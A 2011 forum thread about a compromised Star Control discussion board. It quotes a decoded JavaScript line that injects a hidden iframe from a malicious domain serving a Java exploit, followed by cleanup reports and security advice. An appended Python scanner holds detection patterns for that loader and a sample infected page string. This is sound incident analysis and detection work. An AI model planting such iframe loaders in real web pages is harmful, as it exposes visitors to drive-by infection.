The Ur-Quan Masters Discussion Forum - General UQM Discussion
Topic: Star-control.com discussion board compromised (Read 6714 times)
Megagun (Enlightened, Posts: 580)
Star-control.com discussion board compromised
« on: August 01, 2011, 06:17:03 pm »

It has come to my attention that the Star Control Discussion Board hosted on star-control.com has been compromised, and an iframe has been injected that points towards locumresources.com.

I advise you all to not visit the SCDB (and star-control.com) right now. It appears that the following bit of JavaScript will be executed if you do: http://pastebin.com/csA3wBAe

I'll look into this further to see what exactly is happening.

EDIT 1:
Seems like the following bit of code injects the iframe:
http://pastebin.com/xqN1Adqu
This produces the following string:
Code:
document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')
(Don't visit this locumresources.com URL using your browser.)
This string is then eval'd, which will embed the iframe.

When your browser goes to locumresources.com, it fetches a page with a lot of random numbers, and the following bit of JavaScript:
http://pastebin.com/x5D2RwKE

Once executed, this bit of JavaScript produces the following:
http://pastebin.com/csA3wBAe

I'm currently decompiling the worms.jar file to see what it does.

EDIT 2:
A VirusTotal report on http : // locum resources .com /k.php ?f=20 &e=2     (one of the URLs referred to in the JavaScript mess. Spaces added to protect the innocent. Do not visit this URL if you're not sure what you're doing!)
http://www.virustotal.com/file-scan/report.html?id=37e7b90d821bb14a45129c121510395547a2d1df8f4e262c7a1183e0c90e32d5-1312203813
« Last Edit: August 01, 2011, 06:47:53 pm by Megagun »

Dabir (*Smell* controller, Posts: 291)
Re: Star-control.com discussion board compromised
« Reply #1 on: August 01, 2011, 07:33:45 pm »

Well damn, I just visited it. I visit it first. I didn't see any iframes, but the fonts were bugged up and phpBB was issuing debug notices at the top complaining about headers having already been sent. I'd go back and check, but right now I must scan my computer.
Nuclear (Zebranky food, Posts: 17)
Re: Star-control.com discussion board compromised
« Reply #2 on: August 01, 2011, 08:55:34 pm »

Same here, it was pretty natural for me to visit Star-Control.com first. :(

Are those actual error codes? By the look of the page's source, they might have just been typed out.
Androsynth eat humans for breakfast. "Needs some salt," nuff said. Combine eat Androsynth for breakfast. "Will 5 bucks pay the bill?"

Draxas (Enlightened, Posts: 1044)
Re: Star-control.com discussion board compromised
« Reply #3 on: August 01, 2011, 09:22:21 pm »

Was wondering what was going on when I got all those broken script notices earlier. I also found that all the links to subforums were dead, and also kicking back broken script messages. I had no idea this had something to do with an attack site.

Well, it's my PC at work, so there's nothing I can do for it. If the virus and spyware protection here can't catch it, I'm pretty much stuck.

Let us know when this gets resolved.
chenjesuwizard (*Many bubbles*, Posts: 158)
Re: Star-control.com discussion board compromised
« Reply #4 on: August 02, 2011, 12:49:37 am »

I'm scanning my computer and I ran Rkill. Rkill picked up something called Reminder.exe. It was in C:/Program Files/TTG/Reminder.exe. (That may be slightly wrong, it's from memory). I deleted that file and hope it's that, not something else.
Friendship is like peeing on yourself: everyone can see it, but only you get the warm feeling that it brings.

oldlaptop (*Smell* controller, Posts: 337)
Re: Star-control.com discussion board compromised
« Reply #5 on: August 02, 2011, 03:39:08 am »

The SCDB front page looks clean to me now (some innocuous-looking JavaScript probably generated by the forum software, no references to locumresources.com anywhere), but the boards are still down. All links other than 'Board Index' and the board logo bring up an error that './cache is not writable', so I'd guess that the databases have been taken down for checking.
Play Supermelee online in #uqm-arena!
Netmelee Improvement Mod

Admiral Zeratul (*Many bubbles*, Posts: 223)
Re: Star-control.com discussion board compromised
« Reply #6 on: August 02, 2011, 05:02:26 am »

I've also seen two spam threads on this forum recently. Could it be related somehow?
Priority override. New behavior dictated. Must break post into component ideas.

oldlaptop (*Smell* controller, Posts: 337)
Re: Star-control.com discussion board compromised
« Reply #7 on: August 02, 2011, 05:49:10 am »

SCDB is back up.
Angelfish (Enlightened, Posts: 568)
Re: Star-control.com discussion board compromised
« Reply #8 on: August 02, 2011, 08:27:24 am »

Quote from oldlaptop: "SCDB is back up."

That's dangerous to say.
But can we visit it without risk of getting infected?
Yesterday at home it caused various virus mentions.
Megagun (Enlightened, Posts: 580)
Re: Star-control.com discussion board compromised
« Reply #9 on: August 02, 2011, 02:37:34 pm »

It's gone now, yes. I checked with Firefox and NoScript enabled. The bit that inserts the iframe is gone now.

However, it could be that whoever inserted that iframe has removed it himself, perhaps because he has succeeded in his goal (steal an Admin account so that he now has access to the database/php scripts?). Unless some SCDB Admin comes forward and tells us that he's removed the offending bit of javascript, I wouldn't trust the SCDB.
Draxas (Enlightened, Posts: 1044)
Re: Star-control.com discussion board compromised
« Reply #10 on: August 02, 2011, 04:02:57 pm »

I'm guessing Luki would be the most likely to show up here. Until he (or Chad, or whoever) shows up, I guess I'll keep away for a while.
Anthony (*Smell* controller, Posts: 358)
Re: Star-control.com discussion board compromised
« Reply #11 on: August 02, 2011, 06:38:53 pm »

At least the code was removed. I got ESET on my computers and the sites got blocked, and it even alerted me when I looked at the code in pastebin.

The virus info from the ESET website said it's an exploit that can run "arbitrary code" on the user's PC - http://www.eset.eu/encyclopaedia/js-exploit-javadepkit-a-java-cve-2010-0886-a-javaws-bloodhound-292?lng=en

Hopefully, nobody lost anything or got their PC infected.
meep-eep (Forum Admin, Enlightened, Posts: 2847)
Re: Star-control.com discussion board compromised
« Reply #12 on: August 02, 2011, 07:12:47 pm »

My observations and conclusions:
  • Judging by the error messages, code was inserted in the PHP page source.
  • That means that someone had system access on the server.
  • Because the page was broken, and because of the contents which were included, it's likely that this was an automated attack.
  • This may make it less likely that any specific data has been stolen.
  • Change your password regardless.
  • From what I could find on possible candidates for this malware, compromised websites actually try to exploit the visitors' systems through various vulnerabilities in their software (mostly browser plugins).

My advice:
  • Keep your software up-to-date with respect to security updates! In particular your operating system (Windows), browser, and browser plugins (Java, Flash Player, PDF reader). Install Secunia PSI to help you with this. (It's free.)
  • (Windows) Have a virus scanner active.
  • Change your password for star-control.com, and on any place where you use the same password.
  • (Don't use the same passwords on important sites, and use a strong password.)
  • Avoid mainstream software, which is what is targeted through automated exploits. Use alternative PDF readers rather than Adobe Reader (Foxit Reader, PDF-XChange Viewer, ...), other browsers than Internet Explorer and Firefox, perhaps even your operating system (Linux or MacOS instead of Windows).
  • Don't have software installed which you don't use, in particular anything which acts as a server or plugs into your browser.
  • Make regular back-ups.

Also, the spam on the UQM forum is just that, spam. Annoying, but relatively harmless. This happens quite frequently and is usually removed quickly enough.

Disclaimer: While IT security is what I do professionally, I have not thoroughly investigated this attack. YMMV.
« Last Edit: August 02, 2011, 07:14:30 pm by meep-eep »

“When Juffo-Wup is complete
when at last there is no Void, no Non
when the Creators return
then we can finally rest.”

Lukipela (Enlightened, Posts: 3619)
Re: Star-control.com discussion board compromised
« Reply #13 on: August 02, 2011, 07:56:28 pm »

Just back from non-internet land and something like this is here to spoil my day. All I know is that the site was indeed hacked and that Chad thinks he has fixed it. I've paged him to this thread, so hopefully he'll be able to clarify things more thoroughly than me. All I know is that he has locked down most things, I've no longer got FTP access to the site.
What's up doc?

Chad (*Many bubbles*, PNF Webmaster, Posts: 201)
Re: Star-control.com discussion board compromised
« Reply #14 on: August 02, 2011, 09:00:10 pm »

Megagun, thank you for letting everyone know.

Yes, when I got home on 8/1, I noticed exploit warnings being flagged by my virus scanner while using my browser.

Then I figured out it was coming from the browser tab running SCDB.

I'm fairly certain the compromise happened on 8/1 and I was done cleaning it up on 8/1.  I spent several hours analyzing and restoring.

I removed ftp access and changed account password(s).

It looks like something got in and changed index.* and login.* throughout all directories to contain the malicious code.  It seems automated.

I went through every single directory and restored the indexes from backup and then re-downloaded the entire contents of the site and virus scanned it again to make sure the files no longer had any malicious code.

I have no idea how they got in and if anyone has any ideas on how to figure that out, I'd love the help.

Sorry for any trouble, stuff like this just sucks.

"...Dogar And Kazon Clack Their Mandibles Against One Another And Snicker With Amusement."
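As an added, defender-side example that is not code from this thread or from star-control.com: a small Python scanner that does what Chad describes doing by hand. It walks a web root, looks only at index.* and login.* files (the ones he reports as rewritten in every directory), and flags the indicators Megagun decoded, namely an eval'd document.write of a 1x1 iframe pointing at locumresources.com. The sample web root it builds is constructed for the demo; file names and the forum layout are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators from the decoded snippet quoted in the thread. The eval-of-
# document.write and 1x1 iframe shapes also catch re-obfuscated variants.
INDICATORS = {
    "known_domain": re.compile(r"locumresources\.com", re.I),
    "hidden_iframe": re.compile(r"<iframe[^>]*\b(width|height)=[\"']?1(?!\d)", re.I),
    "eval_docwrite": re.compile(r"eval\s*\(.*document\.write", re.I | re.S),
}
# Chad reported index.* and login.* as the files rewritten in every directory.
TARGET_NAMES = re.compile(r"^(index|login)\.[a-z0-9]+$", re.I)

def scan_file(path: Path) -> list[str]:
    """Return the names of the indicators found in one file."""
    text = path.read_text(errors="replace")
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Map each flagged index.*/login.* file (POSIX relative path) to its hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if TARGET_NAMES.match(name):
                p = Path(dirpath) / name
                hits = scan_file(p)
                if hits:
                    findings[p.relative_to(root).as_posix()] = hits
    return findings

# Constructed (hypothetical) sample web root: one clean index, one login page
# carrying the injected loader, and a non-target file that mentions the domain.
INJECTED = ('<html><body><script>eval(unescape(\'document.write(\\\'<iframe '
            'src="http://locumresources.com/forum.php?tp=x" width="1" height="1" '
            'frameborder="0"></iframe>\\\')\'))</script></body></html>')

def build_sample_root() -> Path:
    root = Path(tempfile.mkdtemp(prefix="scdb_"))
    (root / "forum").mkdir()
    (root / "index.php").write_text("<?php echo 'clean'; ?>")
    (root / "forum" / "login.php").write_text(INJECTED)
    (root / "forum" / "notes.txt").write_text("see locumresources.com report")
    return root

if __name__ == "__main__":
    for path, hits in scan_webroot(build_sample_root()).items():
        print(path, hits)
```

Run it against a real web root by passing that directory to scan_webroot instead of build_sample_root(); a hit on known_domain alone is a strong signal, while the other two indicators narrow down obfuscated loaders.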